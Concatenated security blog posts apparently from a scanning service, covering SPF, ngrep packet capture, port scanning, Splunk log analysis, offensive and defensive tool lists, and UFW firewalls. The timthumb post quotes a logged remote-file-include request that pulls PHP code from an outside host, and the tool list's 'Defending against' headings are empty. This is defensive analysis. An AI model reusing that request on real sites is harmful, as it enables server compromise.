An SPF record is a DNS TXT record that contains the IP addresses of the servers that are permitted to send email for a domain. My domain hackertarget.com wants to send email to people all around the world when they sign up for services. By setting the SPF record I have indicated that only my servers and Google servers are allowed to send email on my behalf.

Google mail servers are included in my SPF record as I use Google Apps for as an email client for support operations.

Lets take a look using the DNS lookup tool dig. On Windows you could use the nslookup tool, just remember to set the type to TXT.

dig -t txt hackertarget.com

; <<>> DiG 9.9.2-P1 <<>> -t txt hackertarget.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 26126
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;hackertarget.com.		IN	TXT

;; ANSWER SECTION:
hackertarget.com.	3593	IN	TXT	"v=spf1 include:_spf.google.com ip4:178.79.163.23 ip6:2a01:7e00::f03c:91ff:fe70:d437 ~all"

;; Query time: 150 msec
;; SERVER: 127.0.1.1#53(127.0.1.1)
;; WHEN: Tue May 21 22:06:31 2013
;; MSG SIZE  rcvd: 289

Ok, there is a bunch of info in the output - we are focusing on the TXT record in the ANSWER section. Here's a quick tip for dig users, add +short to clean up that output.

dig +short -t txt hackertarget.com
"v=spf1 include:_spf.google.com ip4:178.79.163.23 ip6:2a01:7e00::f03c:91ff:fe70:d437 ~all"

The TXT record shows that _spf.google.com and my IPv4 and IPv6 addresses are the only ones allowed to send email that originates from @hackertarget.com addresses. Having ~all on the end of the record indicates that email from other servers should still be accepted but it will given a weighting that indicates it could be spoofed. The server accepting the email has to have SPF in place as part of its mail filtering. So the weighting could result in added points in a spam assassin server as an example.

If you use Gmail, check the headers of any email going into Gmail, you will notice Google is performing SPF checks on incoming email. It uses the SPF check as one part of its spam parsing algorithm.

What is the advantage of an SPF Check?

As I have mentioned SPF checks can be used as a factor in assessing spam. A spammer will send thousands of messages with a forged SMTP header pretending to be a legitimate email account. With a SPF check email from your domain and from your servers are marked as legitimate, while others are either blocked or flagged as possibly suspicious.

It is a similar case for spear phisherman who can send a forged email pretending to be someone in your organisation to another with the aim of getting them to click on a malicious link or document. An SPF check will reduce the likelihood of the email reaching the victims Inbox.

Some things keep in mind when implementing SPF records

It is free to add it to your domain, simply add a TXT record to your DNS.
* Having it is a good idea, your email will be more likely to be accepted by SPF enabled email servers and not put in the spam folder. Both Microsoft and Google are using SPF as part of email delivery for Outlook.com and Gmail respectively.
* There is a gotcha when it comes to email forwarding, if you forward email from external parties to another mail service (such as Gmail), the original sender information stays intact but since your server that is forwarding the mail is not in the SPF record for that external mail then the destination server may give the forwarded message an SPF Fail.
* IPv6 - don't forget to add it to your SPF record if you have it enabled. While we have IPv6 up on HackerTarget.com for the web site, I discovered that email to Gmail was also going out via IPv6. Hence the addition of our IPv6 address to the SPF TXT record.

Get more information from the Send Policy Framework Wikipedia page.

The post SPF Checked – a look at the Send Policy Framework appeared first on Online Vulnerability Scanners and Port Scans.

You may have heard of Wireshark (formerly Ethereal), a powerful network packet capture tool that enables a user to grab packets off the wire, load pcaps and analyse the data all in one GUI. While Wireshark is a must have tool for many IT pro’s there are times when a simple command line tool can get the job done faster.

Ngrep – or Network Grep

On your Ubuntu (or Debian based) system it is a simple matter of installing with apt-get. Under Fedora, Centos or RHEL if the package is not available in the repos, grab a copy of the rpm and install with a simple rpm -ivh (no dependencies required).

testbox:~#apt-get install ngrep
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following NEW packages will be installed:
  ngrep
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 29.1 kB of archives.
After this operation, 92.2 kB of additional disk space will be used.

Wow, take a look at that – 29.1kB had to be downloaded and 92.2 kB of disk space has been used by this tool. Maybe I should get a bigger hard drive!!

A couple of basic examples to get you started with ngrep.

testbox:~#ngrep -d wlan0 '^POST'
interface: wlan0 (192.168.1.0/255.255.255.0)
match: ^POST

The syntax is -d wlan0 for the device you wish to capture from, followed by the expression to match. This example will match packets with POST at the start of the line, or HTTP POST requests in a simple text output format. The ‘#’ marks indicate packets that did not match the expression. Further filtering can be done on ports and ip addresses.

Here is a more telling example to give you an idea of the possibilities.

testbox:~#ngrep -t -d wlan0 'pwd'
interface: wlan0 (192.168.1.0/255.255.255.0)
match: pwd
#############
T 2013/05/08 23:30:46.559360 192.168.1.100:48187 -> 173.255.232.18:80 [AP]
  POST /wp-login.php HTTP/1.1..Host: hackertarget.com..User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0..Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8..Accept-Language: en-US,en;q=0.5..Accept-Encoding: gzip, deflate..Referer: http://hackertarget.com/wp-login.php..Connection: keep-alive..Content-Type: application/x-www-form-urlencoded..Content-Length: 106....log=admin&pwd=testpassword&wp-submit=Log+In&redirect_to=http%3A%2F%2Fhackertarget.com%2Fwp-adminF&testcookie=1                                                                                                              
###############################################################################################################^Cexit
124 received, 0 dropped

The addition of the -t will put a timestamp on the matching results. Notice what I have done here, a simple grep for the string ‘pwd’ has shown the HTTP POST request with my login and password for the http://hackertarget.com/ login page. A quick example that demonstrates the importance of using the SSL version of the site (https://hackertarget.com/).

tcpflow – logging all the datas

With tcpflow the installation is similar to that of ngrep, at least under Ubuntu.

apt-get install tcpflow

tcpflow will log all the tcpflows – or TCP sessions into text files in the current directory where it runs. Use tcpdump command line switches for determining what to capture.

tcpflow -i wlan0 'port 80'

This example will capture all HTTP flows over port 80 and store them as text files. A great way to troubleshoot web applications, or network protocols.

Tshark – another worthy command line packet capture tool

tshark is part of the Wireshark package, and is basically a text or console based version of Wireshark. It has many options and can be used to perform much of what ngrep and tcpflow do. However, the advantage of ngrep and tcpflow is their simplicity and ease of use. It will often come down to what tools you have available on the system.

These examples just touch the surface whether troubleshooting or performing security analysis; any plain text protocol can be inspected, POP3, SMTP, IRC, DNS and HTTP are just a few possibilities. On a related note the excellent bro (no longer bro-ids) performs excellent flow analysis and is a tool worth investigating if you are performing security related packet captures.

The post ngrep and tcpflow – packet capture on a shoestring appeared first on Online Vulnerability Scanners and Port Scans.

Why you need an external port scanner

To understand how vulnerable your systems are to external attackers, you need to understand what they look like on the network from an external or Internet facing perspective. A port scan conducted from outside a network perimeter will map and identify vulnerable systems.

Technical operations staff need to know what their network perimeter looks like from the outside. The perimeter may be a single IP gateway, a hosted Internet server or a whole Class B network; it does not matter – you need to understand what services Internet based threats can see and what they are able to access.

If you are a systems administrator or a security analyst for an organisation having access to an external port scanner will provide a number of benefits; The most important being that you should understand and know exactly what services are listening on your perimeter. Testing should be performed at least monthly and ideally more often, to monitor for changes to the perimeter.

Firewall Testing

A firewall’s primary function is to block unauthorised packets from being able to reach listening services. The firewall can be situated on the perimeter of an organisations network or it can be on an internal network. It can also be on the end point whether that is a client desktop or a Internet server such as a web server or mail server.

Multiple firewalls and filtering devices increases the complexity of assessing a network. Using a port scanner one is able to quickly assess what ports are being permitted through the various layers of defence and are able to reach services on the end point host.

To effectively test a firewall and network for external access points, it is necessary to perform the port scanning from a remote host. By using the HackerTarget.com hosted online port scanner service you are able to quickly test a range of IP Addresses or a single IP address. All 65’535 ports can be tested at the click of a mouse, with the results delivered to your email address for review.

From the results of the port scan you are able to determine the state of a port:

Why ingress firewall filtering is required

Restrict access to vulnerable services, reduce attack surface of Internet facing systems and reduce ability of an attacker to open back-doors on Internet facing ports.

Why egress firewall filtering is required

Data ex-filtration and outbound initiated remote access. Command shells and other remote access can be achieved by a system initiating an outbound connection. Limiting the available outbound ports can make this outbound communication more difficult for an attacker. Note – this does not entirely solve the problem as advanced tools and attackers are able to initiate communication through multiple means including over https proxy servers, STMP and even DNS queries.

Troubleshooting Network Services

When installing and configuring Internet facing services it will often be necessary to troubleshoot a network configuration in order to get a service up and running. For example you may have correctly setup the service on the server with everything operating correctly, however an external firewall may be blocking remote access to this service.

While the situations in which network troubleshooting is required are varied, it is a common methodology to perform an external port scan against the network port or system to quickly understand where the problem may lie. If you are able to connect to a service from the internal host but unable to connect from external, you can make a pretty good guess at where the problem might lie. By performing a port scan using an external online port scan you are able to quickly confirm that all the required services are being filtered – hence your troubleshooting can move to looking at any external or host based firewalls that are blocking that port.

Mapping Networks and Services

In order to determine how vulnerable a network or host is to exploitation, it is necessary to know what services are running and whether they are externally facing (or accessible from the Internet). By performing a remote port scan against the network IP range or against a specific host it is possible to determine not only the open ports but also the types of services running on those ports. This is known as service detection and is a feature of most well known port scanners such as the nmap port scanning tool.

Further more identification of the actual operating system is also possible, either from the service identification or through more low level analysis of the packets coming back from the host.

System and network administrators will also utilize port scanners to map the external network of a host or organisation. Networks change over time and documentation is not always kept current, so a quick port scan of the services listening on a network will help a system administrator to understand the layout of the network.

The post Firewall Testing with a remote Port Scanner appeared first on Online Vulnerability Scanners and Port Scans.

Back in August 2011 a serious vulnerability was found in many popular WordPress themes and Plugins. The code that enabled automatic thumbnail creation when publishing with the WordPress content management system. While not a part of the WordPress core, the code had been reused by many developers including both commercial and free theme builders.

The critical vulnerability is a remote file include (RFI) that allows an attacker to have the thumb.php code include additional code to execute PHP on the web server. An attacker will attempt to use this vulnerability to execute commands on the web server.

So widespread was the vulnerability that attackers have been compromising WordPress installations for the past 18 months and continue to do so. Just yesterday my OSSEC host based intrusion detection system alerted me to continued attempts at exploiting the timthumb vulnerability.

61.246.x.x - - [02/Feb/2013:18:33:28 +0000] "GET /wordpress-themes-in-top-1-million-websites/wp-content/themes/suffusion/timthumb.php?src=http://picasa.com.c        t.ro/wordpress.php HTTP/1.1" 404 36 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"

This is an example attack from my logs a few days ago, you can see the WordPress path being attempted, the theme name and the ?src= is the URL of the remote include PHP code.

Anyone who has patched the vulnerability with updated code is not affected by these ongoing attempted attacks, they simply fill your web server log files with attempts to execute thumb.php on various common paths resulting in 404 not found errors.

What is Splunk?

If your job involves looking at logs then you should spend some cycles playing with the Splunk Search engine. It is a commercial product, but comes in a free version that allows you to consume 500mb of logs per day. Great for performing adhoc analysis or small to mid-size projects.

In order to perform some simple analysis of my web server logs to view the frequency, sources and attempts to exploit this timthumb vulnerability I have turned to Splunk.

Feeding Splunk a year of Timthumb Attacks

Timthumb Events per month over 1 year

WPScan is an Open Source Scanner that can detect security issues with WordPress installations, including timthumb vulnerabilities. A hosted version of this tool is available in our active WordPress Security Scan.

To begin I installed Splunk and fed it a single file. The file contained 12 months worth of logs from my Nginx web server, I used grep to only feed log entries that included thumb in the path and resulted in a 404 not found. In other words every log event that I have in my Splunk instance is a single attempt to exploit the timthumb vulnerability.

Since the data in my Splunk instance is only made up of timthumb exploit attempts the initial search string shows all the attempts per month over the 12 months.

source="/home/fred/nginx-logs/access-complete-thumb.txt"

It is clear from this simple query that even though the initial vulnerability was released in August 2011, there was a major jump in the number of attacks against my server from July 2012. The reason for the increased number of attempts appears to be an increase in the tested paths of the timthumb code (more known bad themes). These lists are then included in the attack scripts.

Where did the attacks come from?

Using the Splunk GeoIP APP it is a simple matter to determine where the attacks are coming from. Once you have the base lookup working Splunk makes it easy to chart the results of the top countries or cities.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | lookup geoip clientip | top 20 client_country

This query shows the Top 20 countries for total number of attacks.

Since some of these IP addresses are sending thousands of attempts, I will take a closer look at the number of unique IP addresses by location. Instead of a simple chart I will use the Google Map APP that allows the geolocations to be plotted onto a Google Map. Using a map takes this visualization to the next level. A great way to impress the boss with a couple of clicks!!

From a quick look at the map it is apparent that there are no timthumb hackers in Mongolia.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | stats count by clientip | geoip clientip

Top attacking IP Addresses

Piping the search into top 20 clientip shows the top attacking IP address as 178.25.214.92 with 2445 events. Click on the IP address and it easy to see that all attempts from this IP occurred during an 8 minute window on the 30th of August 2012. Whois shows this IP address is a broadband connection in Germany.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | top 20 clientip

source="/home/fred/nginx-logs/access-complete-thumb.txt" clientip="178.25.214.92"

Most Attacked WordPress Themes

To extract the most popular themes that are being attacked I have used a regex on /wp-content/themes/ to get the theme path. It is clear that many of the attacked themes in the top 20, correlate with the most popular WordPress themes in the Top 1 million websites.

source="/home/fred/nginx-logs/access-complete-thumb.txt" | rex field=_raw "wp-content\/themes\/(?[\w\-]*)" | top 20 wptheme

Looking at the most attacked WordPress themes I discovered that some attacks were not “blind” attempts, they were targeted against my theme that I have on a non-standard path. This indicates my site was explicitly targeted either manually after extraction of the path from the HTML source of my page or by a script parsing the HTML for those attempts. 31 different IP addresses had a go at my non-default theme path. In the top 5 I found 3 web hosting net blocks (Sweden, Germany and the USA), a Greek university and two Tor exit nodes.

source="/home/fred/nginx-logs/access-complete-thumb.txt" uri_path="/wp-content/themes/delegate2.3/functions/thumb.php" | top clientip

I have really only the scratched the surface of what is possible when using Splunk to analyse your web logs for attacks and other issues. Install it, and start playing you will not be disappointed. For those who are wary of the Splunk price tag for larger amounts of data I suggest taking a look at ELSA and GreyLog2, these are both open source log management systems that seem promising and are developing rapidly.

The post There are no WordPress Timthumb Hackers in Mongolia appeared first on Online Vulnerability Scanners and Port Scans.

Head over to the MaxMind website and grab the latest version of the GeoLiteCity.dat.gz file.

Download: http://dev.maxmind.com/geoip/geolite

Now uncompress the download with gzip.

gzip -d GeoLiteCity.dat.gz

If you take a look in /opt/splunk/etc/apps/maps/bin/ of your Splunk install you will see the version of the GeoLiteCity.dat file is August 20, 2011. Time to update it to the latest version.

cp GeoLiteCity.dat /opt/splunk/etc/apps/maps/bin/

Start searching Splunk with the latest GeoIP data from MaxMind. It really is that easy.

The post Update GeoIP data for Splunk App appeared first on Online Vulnerability Scanners and Port Scans.

Open Source Splunk Alternative

If you are interesting in a purely Open Source log search engine, take a look at ELSA – Enterprise Log Search and Archive this is a relatively new project that is making good progress. It has been included on the latest Security Onion release.

Another Open Source log management option is Greylog2. I am yet to test or explore this alternative to Splunk but I have read some good reviews and it looks promising.

Download Splunk for Ubuntu

Splunk runs on a wide range of computing platforms including Windows, Linux, FreeBSD, OSX, Solaris, AIX and even HPUX.

http://www.splunk.com/download?r=header

We are after the Linux download option, specifically the .deb file as Ubuntu uses the Debian based .deb package format for binary installs. It is a matter of selecting either 32bit or 64bit and then downloading the .deb file.

Not sure whether your Ubuntu is 32bit or 64bit? The easiest way to check this is to use a Unix command uname -a in a terminal window. Bring up a terminal window and type in that command. x64 indicates 64bit while i686 i386 indicates a 32 bit install.

The 32 bit package is about 35.5mb, you will need to signup for a Splunk account to begin the download. It is worth creating an account you will remember as this same acocunt will be used to download additional plugins (apps) from the Splunk site.

Once the download is complete you can install it with the following dpkg command as seen in the output below:

fred@x-wing1:~$ sudo dpkg -i Downloads/splunk-5.0.1-143156-linux-2.6-intel.deb 
[sudo] password for fred: 
Selecting previously unselected package splunk.
(Reading database ... 239507 files and directories currently installed.)
Unpacking splunk (from .../splunk-5.0.1-143156-linux-2.6-intel.deb) ...
Setting up splunk (5.0.1-143156) ...
----------------------------------------------------------------------
Splunk has been installed in:
        /opt/splunk

To start Splunk, run the command:
        /opt/splunk/bin/splunk start


To use the Splunk Web interface, point your browser at:

http://x-wing1:8000

Complete documentation is at http://docs.splunk.com/Documentation/Splunk
----------------------------------------------------------------------

Yes it is that easy, no dependencies or mucking around. Now its time to start the Splunk server.

sudo /opt/splunk/bin/splunk start

After some initial setup, you should see:

The Splunk web interface is at http://x-wing1:8000

Login and change your password. You now have your very own Splunk server, just like the cool kids.

Feed Splunk Data and Search!

Start getting data in the system and then you can search on that data. Data can be input from simple files for some one off analysis, it can read known log files or can listen on a port similar to a syslog server. It is very flexible, for example running it on a TCP port you could even use netcat to pipe a file over the network into Splunk server, or have a syslog server forward some of its logs to the Splunk instance. This would leave you with your existing syslog infrastructure intact for archival purposes but you also have the Splunk instance for easy analysis.

Now you are up to the point where it depends on your network and requirements, so think about how you are going to use it, feed it some data and start searching for stuff. The stuff could be configuration issues, errors, utilization trends or security events. If you want to do some easy testing, just grab a web server log file or other log and feed it in directly with the a file or directory option.

This video is a good introduction to performing Splunk log searches and pulling relevant information from your data.

While I suspect most people will find value from the first day, as you explore the capabilities of the Splunk search engine you will find stuff – its a rabbit hole for systems administrators.

The post Install Splunk on Ubuntu in 5 mins appeared first on Online Vulnerability Scanners and Port Scans.

In March 2012 we conducted a similar survey, that was presented in an info-graphic. Since March 2012 there has been an awareness campaign and much press around World IPv6 day on June 6th 2012. These latest results are a good indication of how much progress has been made.

Total IPv6 Enabled Sites in the Top 1 Million

Websites that enable IPv6 by Netblock owner

In this chart we start to get a picture of where the increase in IPv6 enabled websites has come from. Google has played a major part in this increase. In fact digging deeper into the results reveals that apart from some relatively small increases the only major change since March has been due to the adoption of IPv6 by Google based properties.

Top Hosting Providers and Netblock Owners of IPv6 enabled websites in Top 1 million

Websites that enable IPv6 by Country

Earlier in the year, we saw Germany, Russia and other European nations were well ahead of the USA in the adoption of IPv6 as a percentage of the sites in the country. Now it is clear that the move by Google to enable IPv6 across its web sites has given the United States a given a major boost.

Dark blue are the numbers from March, with the lighter blue the latest August 2012 numbers.

IPv6 enabled web servers

Finally we see again the huge difference that Google has made in the statistics. The GSE server is Blogger / Blogspot powered web sites. Google Front End and GWS are the servers of other sites within the Google web site property base.

In the event that you have not caught on yet, the primary reason why the move by Google to enable IPv6 has caused such an impact on the results is that Blogger and Blogspot make up around 15’000 sites in the Alexa top 1 million. In fact a simple search shows 14914 sites with .blogspot. or .blogger. in the web site host name. Hence when these Google owned properties enabled IPv6, the number of sites in the Alexa top million with IPv6 addressing more than doubled overnight.

The post Leading websites that enable IPv6 now at 2.68% appeared first on Online Vulnerability Scanners and Port Scans.

This selection of tools when utilized by a moderately skilled attacker has the potential to wreak havoc on an organizations network.

If you are interested in testing these tools they are all available to download and use for FREE. Most are open source with a couple of exceptions. They should not be used against systems that you do not have permission to attack. You could end up in jail.

1. Metasploit Framework – an open source tool for exploit development and penetration testing Metasploit is well known in the security community. Metasploit has exploits for both server and client based attacks; with feature packed communication modules (meterpreter) that make pwning systems fun! The framework now includes Armitage for point and click network exploitation. This is the go to tool if you want to break into a network or computer system.

Defending against Metasploit:

2. Ettercap – a suite of tools for man in the middle attacks (MITM). Once you have initiated a man in the middle attack with Ettercap use the modules and scripting capabilities to manipulate or inject traffic on the fly. Sniffing data and passwords are just the beginning; inject to exploit FTW!

Defending against Ettercap:

3. sslstrip – using HTTPS makes people feel warm, fuzzy and secure. Using sslstrip this security can be attacked, reducing the connection to an unencrypted HTTP session, whereby all the traffic is readable. Banking details, passwords and emails from your boss all in the clear. Even includes a nifty feature where the favicon on the unencrypted connection is replaced with a padlock just to make the user keep that warm and fuzzy feeling.

Defending against sslstrip:

4. evilgrade – another man in the middle attack. Everyone knows that keeping software updated is the way to stay secure. This little utility fakes the upgrade and provides the user with a not so good update. Can exploit the upgrade functionality on around 63 pieces of software including Opera, Notepad++, VMware, Virtualbox, itunes, quicktime and winamp! It really whips the llamas ass!

Defending against evilgrade:

5. Social Engineer Toolkit – makes creating a social engineered client side attack way too easy. Creates the spear phish, sends the email and serves the malicious exploit. SET is the open source client side attack weapon of choice.

Defending against SET:

6. sqlmap – SQL Injection is an attack vector that has been around for over 10 years. Yet it is still the easiest way to get dumps of entire databases of information. Sqlmap is not only a highly accurate tool for detecting sql injection; but also has the capability to dump information from the database and to even launch attacks that can result in operating system shell access on the vulnerable system.

Defending against sqlmap:

7. aircrack-ng – breaking holes in wireless networks for fun and profit. A suite of tools that enables all manner of wireless network attacks.

Defending against aircrack-ng:

8. oclHashcat – Need to get some passwords from the hashes you grabbed with sqlmap? Use this tool to bust them open. Over 48 different hashing algorithms supported. Will use the GPU (if supported) on your graphics card to find those hashes many times faster than your clunky old CPU.

Defending against oclHashcat:

9. ncrack – Brute force network passwords with this tool from Fyodor the creator of Nmap. Passwords are the weakest link and Ncrack makes it easy to brute force passwords for RDP, SSH, http(s), SMB, pop3(s), VNC, FTP, and telnet.

Defending against ncrack:

10. Cain and Abel – Cracking passwords, sniffing VOIP and Man in the Middle (MITM) attacks against RDP are just a few examples of the many features of this Windows only tool.

Defending against Cain and Abel:

11. Tor – push your traffic through this onion network that is designed to provide anonymity to the user. Note your traffic from the exit node is not encrypted or secured. Make sure you understand what it does before using it, Tor provides anonymity not encrypted communication.

Defending against Tor:

If you are interested in testing these offensive security tools you should take a look at the BackTrack Linux distribution. It includes many of these and other tools pre-installed.

These tools are used by security professionals around the world to demonstrate security weakness.

The post 11 Offensive Security Tools for SysAdmins appeared first on Online Vulnerability Scanners and Port Scans.

The following are 10 essential security tools that will help you to secure your systems and networks. These open source security tools have been given the essential rating due to the fact that they are effective, well supported and easy to start getting value from.

1. Nmap – map your network and ports with the number one port scanning tool. Nmap now features powerful NSE scripts that can detect vulnerabilities, misconfiguration and security related information around network services. After you have nmap installed be sure to look at the features of the included ncat – its netcat on steroids.

2. OpenVAS – open source vulnerability scanning suite that grew from a fork of the Nessus engine when it went commercial. Manage all aspects of a security vulnerability management system from web based dashboards. For a fast and easy external scan with OpenVAS try our online OpenVAS scanner.

3. OSSEC – host based intrusion detection system or HIDS, easy to setup and configure. OSSEC has far reaching benefits for both security and operations staff.

4. Security Onion – a network security monitoring distribution that can replace expensive commercial grey boxes with blinking lights. Security Onion is easy to setup and configure. With minimal effort you will start to detect security related events on your network. Detect everything from brute force scanning kids to those nasty APT’s.

5. Metasploit Framework – test all aspects of your security with an offensive focus. Primarily a penetration testing tool, Metasploit has modules that not only include exploits but also scanning and auditing.

6. OpenSSH – secure all your traffic between two points by tunnelling insecure protocols through an SSH tunnel. Includes scp providing easy access to copy files securely. Can be used as poor mans VPN for Open Wireless Access points (airports, coffee shops). Tunnel back through your home computer and the traffic is then secured in transit. Access internal network services through SSH tunnels using only one point of access. From Windows, you will probably want to have putty as a client and winscp for copying files. Under Linux just use the command line ssh and scp.

7. Wireshark – view traffic in as much detail as you want. Use Wireshark to follow network streams and find problems. Tcpdump and Tshark are command line alternatives. Wireshark runs on Windows, Linux, FreeBSD or OSX based systems.

8. BackTrack – an Ubuntu based Linux distribution that is configured with hundreds of security testing tools and scripts. Backtrack is well known with penetration testers and hobbyists alike.

9. Nikto – a web server testing tool that has been kicking around for over 10 years. Nikto is great for firing at a web server to find known vulnerable scripts, configuration mistakes and related security problems. It won’t find your XSS and SQL web application bugs, but it does find many things that other tools miss. To get started try the Nikto Tutorial or the online hosted version.

10. Truecrypt – encrypt all the things. Truecrypt is a strong encryption utility that can encrypt entire volumes or create an encrypted container within a file system. Use Truecrypt to protect your flash drives. If it gets lost, even the NSA will have trouble reading the data.

The post 10 Essential Open Source Security Tools appeared first on Online Vulnerability Scanners and Port Scans.

Network architectures will vary but if you are deploying Internet facing Servers you generally should be configuring a host based firewall. It can provide protection to listening services that don’t need to be Internet accessible, in addition a firewall can make life more difficult for an attacker who does gain a foothold. Making it more difficult to create a backdoor listener for example.

When deploying an Ubuntu host based firewall you should also consider using the excellent open source HIDS software OSSEC.

The Ubuntu documentation portal has a good run down on implementing UFW.

Here is my shorter summary of UFW and Ubuntu Firewalls

Set the default rule, in case you are wondering this should be default DENY.

sudo ufw default deny

Logging is generally another good idea, lets enable it.

sudo ufw logging on

If you are connected over SSH then set your SSH allow rule now.

sudo ufw allow 22/tcp

HackerTarget.com runs SSH on 2222 to avoid brute forcing SSH bots. So the command is:

sudo ufw allow 2222/tcp

Now turn the firewall on (this applies the iptables commands).

sudo ufw enable

To turn the firewall off.

sudo ufw disable

Allow port 80 (for your webserver to server HTTP).

sudo ufw allow 80/tcp

Allow port 443 (as we have SSL enabled for our clients security).

sudo ufw allow 443/tcp

Allow port 25 (for your Email SMTP)

sudo ufw allow 25/tcp

You get the idea, it is also possible to enable rules that allow and block from specific IP addresses, after all it is just a script for iptables. See the Ubuntu Docs for details on this.

sudo ufw status

This command shows that the firewall is running and configured, now you should do a port scan and test it for real.

Since we run VPS servers on Linode and have configured dual stack IPv4 and IPv6 addresses our web server is happily serving on both protocols. iptables and ip6tables are two separate commands for the configuration of IPv4 and IPv6 firewalls. The excellent thing about UFW is the above commands enables the firewall on both IP stacks.

The post Firewalling Ubuntu with UFW for IPv4 + IPv6 appeared first on Online Vulnerability Scanners and Port Scans.